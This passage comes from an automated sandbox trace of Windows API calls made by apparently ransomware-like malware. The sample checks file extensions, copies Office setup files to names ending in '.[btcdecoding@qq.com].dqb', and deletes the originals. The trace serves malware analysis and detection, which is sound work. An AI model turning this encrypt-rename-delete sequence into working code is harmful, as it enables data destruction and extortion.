lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0038.824] lstrlenW (lpString=".jpg") returned 4 [0038.824] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0038.824] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0038.824] lstrlenW (lpString="SETUP.XML") returned 9 [0038.824] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0038.824] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=9352) returned 1 [0038.825] CloseHandle (hObject=0x17c) returned 1 [0038.825] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml")) returned 0x20 [0038.825] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0038.825] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0038.825] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.825] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.825] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0038.825] GetLastError () returned 0x0 [0038.825] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x2488, lpOverlapped=0x0) returned 1 [0038.827] WriteFile (in: hFile=0x1dc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x2490, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x2490, lpOverlapped=0x0) returned 1 [0038.828] ReadFile (in: hFile=0x17c, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0038.828] WriteFile (in: hFile=0x1dc, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0038.828] SetEndOfFile (hFile=0x1dc) returned 1 [0038.828] CloseHandle (hObject=0x1dc) returned 1 [0038.829] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.829] SetEndOfFile (hFile=0x17c) returned 1 [0038.829] CloseHandle (hObject=0x17c) returned 1 [0038.829] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0038.830] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml")) returned 1 [0038.830] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0038.830] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0038.830] lstrlenW (lpString=".doc") returned 4 [0038.830] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0038.830] lstrlenW (lpString=".docx") returned 5 [0038.830] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0038.830] lstrlenW (lpString=".pdf") returned 4 [0038.830] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0038.830] lstrlenW (lpString=".xls") returned 4 [0038.830] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0038.830] lstrlenW (lpString=".xlsx") returned 5 [0038.830] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0038.830] lstrlenW (lpString=".ppt") returned 4 [0038.830] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0038.830] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0038.830] lstrlenW (lpString=".zip") returned 4 [0038.830] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0038.830] lstrlenW (lpString=".rar") returned 4 [0038.830] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0038.830] lstrlenW (lpString=".bz2") returned 4 [0038.830] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0038.830] lstrlenW (lpString=".7z") returned 3 [0038.831] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0038.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0038.831] lstrlenW (lpString=".dbf") returned 4 [0038.831] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0038.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0038.831] lstrlenW (lpString=".1cd") returned 4 [0038.831] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0038.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0038.831] lstrlenW (lpString=".jpg") returned 4 [0038.831] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0038.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0038.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0038.831] lstrlenW (lpString=".doc") returned 4 [0038.831] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0038.831] lstrlenW (lpString=".docx") returned 5 [0038.831] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0038.831] lstrlenW (lpString=".pdf") returned 4 [0038.831] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0038.831] lstrlenW (lpString=".xls") returned 4 [0038.831] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0038.831] lstrlenW (lpString=".xlsx") returned 5 [0038.831] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0038.831] lstrlenW (lpString=".ppt") returned 4 [0038.831] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0038.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0038.831] lstrlenW (lpString=".zip") returned 4 [0038.831] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0038.831] lstrlenW (lpString=".rar") returned 4 [0038.831] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0038.831] lstrlenW (lpString=".bz2") returned 4 [0038.831] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0038.831] lstrlenW (lpString=".7z") returned 3 [0038.831] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0038.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0038.832] lstrlenW (lpString=".dbf") returned 4 [0038.832] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0038.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0038.832] lstrlenW (lpString=".1cd") returned 4 [0038.832] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0038.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0038.832] lstrlenW (lpString=".jpg") returned 4 [0038.832] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0038.832] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0038.832] lstrlenW (lpString="Office32MUI.XML") returned 15 [0038.832] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0039.197] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=1383) returned 1 [0039.197] CloseHandle (hObject=0x174) returned 1 [0039.197] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml")) returned 0x20 [0039.197] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0039.197] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0039.198] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.198] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.198] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0039.198] GetLastError () returned 0x0 [0039.198] ReadFile (in: hFile=0x174, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x567, lpOverlapped=0x0) returned 1 [0039.199] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x570, lpOverlapped=0x0) returned 1 [0039.200] ReadFile (in: hFile=0x174, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0039.200] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0039.200] SetEndOfFile (hFile=0x1a4) returned 1 [0039.200] CloseHandle (hObject=0x1a4) returned 1 [0039.201] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.201] SetEndOfFile (hFile=0x174) returned 1 [0039.202] CloseHandle (hObject=0x174) returned 1 [0039.202] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0039.202] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml")) returned 1 [0039.202] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0039.202] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0039.202] lstrlenW (lpString=".doc") returned 4 [0039.202] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.202] lstrlenW (lpString=".docx") returned 5 [0039.202] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0039.202] lstrlenW (lpString=".pdf") returned 4 [0039.203] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.203] lstrlenW (lpString=".xls") returned 4 [0039.203] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.203] lstrlenW (lpString=".xlsx") returned 5 [0039.203] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0039.203] lstrlenW (lpString=".ppt") returned 4 [0039.203] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0039.203] lstrlenW (lpString=".zip") returned 4 [0039.203] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.203] lstrlenW (lpString=".rar") returned 4 [0039.203] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.203] lstrlenW (lpString=".bz2") returned 4 [0039.203] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.203] lstrlenW (lpString=".7z") returned 3 [0039.203] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0039.203] lstrlenW (lpString=".dbf") returned 4 [0039.203] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0039.203] lstrlenW (lpString=".1cd") returned 4 [0039.203] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0039.203] lstrlenW (lpString=".jpg") returned 4 [0039.203] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0039.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0039.203] lstrlenW (lpString=".doc") returned 4 [0039.203] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.203] lstrlenW (lpString=".docx") returned 5 [0039.203] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0039.203] lstrlenW (lpString=".pdf") returned 4 [0039.203] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.203] lstrlenW (lpString=".xls") returned 4 [0039.203] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.204] lstrlenW (lpString=".xlsx") returned 5 [0039.204] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0039.204] lstrlenW (lpString=".ppt") returned 4 [0039.204] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0039.204] lstrlenW (lpString=".zip") returned 4 [0039.204] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.204] lstrlenW (lpString=".rar") returned 4 [0039.204] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.204] lstrlenW (lpString=".bz2") returned 4 [0039.204] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.204] lstrlenW (lpString=".7z") returned 3 [0039.204] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0039.204] lstrlenW (lpString=".dbf") returned 4 [0039.204] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0039.204] lstrlenW (lpString=".1cd") returned 4 [0039.204] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0039.204] lstrlenW (lpString=".jpg") returned 4 [0039.204] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.204] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0039.204] lstrlenW (lpString="SETUP.XML") returned 9 [0039.204] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0039.205] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=4207) returned 1 [0039.205] CloseHandle (hObject=0x174) returned 1 [0039.205] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml")) returned 0x20 [0039.205] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0039.205] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0039.206] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.206] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.206] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0039.206] GetLastError () returned 0x0 [0039.206] ReadFile (in: hFile=0x174, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x106f, lpOverlapped=0x0) returned 1 [0039.207] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x1070, lpOverlapped=0x0) returned 1 [0039.208] ReadFile (in: hFile=0x174, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0039.208] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0039.209] SetEndOfFile (hFile=0x1a4) returned 1 [0039.209] CloseHandle (hObject=0x1a4) returned 1 [0039.209] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.209] SetEndOfFile (hFile=0x174) returned 1 [0039.210] CloseHandle (hObject=0x174) returned 1 [0039.211] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0039.211] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml")) returned 1 [0039.211] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0039.211] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0039.211] lstrlenW (lpString=".doc") returned 4 [0039.211] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.211] lstrlenW (lpString=".docx") returned 5 [0039.211] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0039.211] lstrlenW (lpString=".pdf") returned 4 [0039.211] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.211] lstrlenW (lpString=".xls") returned 4 [0039.211] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.211] lstrlenW (lpString=".xlsx") returned 5 [0039.211] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0039.211] lstrlenW (lpString=".ppt") returned 4 [0039.211] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.211] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0039.211] lstrlenW (lpString=".zip") returned 4 [0039.211] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.211] lstrlenW (lpString=".rar") returned 4 [0039.211] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.211] lstrlenW (lpString=".bz2") returned 4 [0039.211] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.211] lstrlenW (lpString=".7z") returned 3 [0039.211] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0039.212] lstrlenW (lpString=".dbf") returned 4 [0039.212] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0039.212] lstrlenW (lpString=".1cd") returned 4 [0039.212] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0039.212] lstrlenW (lpString=".jpg") returned 4 [0039.212] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0039.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0039.212] lstrlenW (lpString=".doc") returned 4 [0039.212] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.212] lstrlenW (lpString=".docx") returned 5 [0039.212] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0039.212] lstrlenW (lpString=".pdf") returned 4 [0039.212] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.212] lstrlenW (lpString=".xls") returned 4 [0039.212] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.212] lstrlenW (lpString=".xlsx") returned 5 [0039.212] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0039.212] lstrlenW (lpString=".ppt") returned 4 [0039.212] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 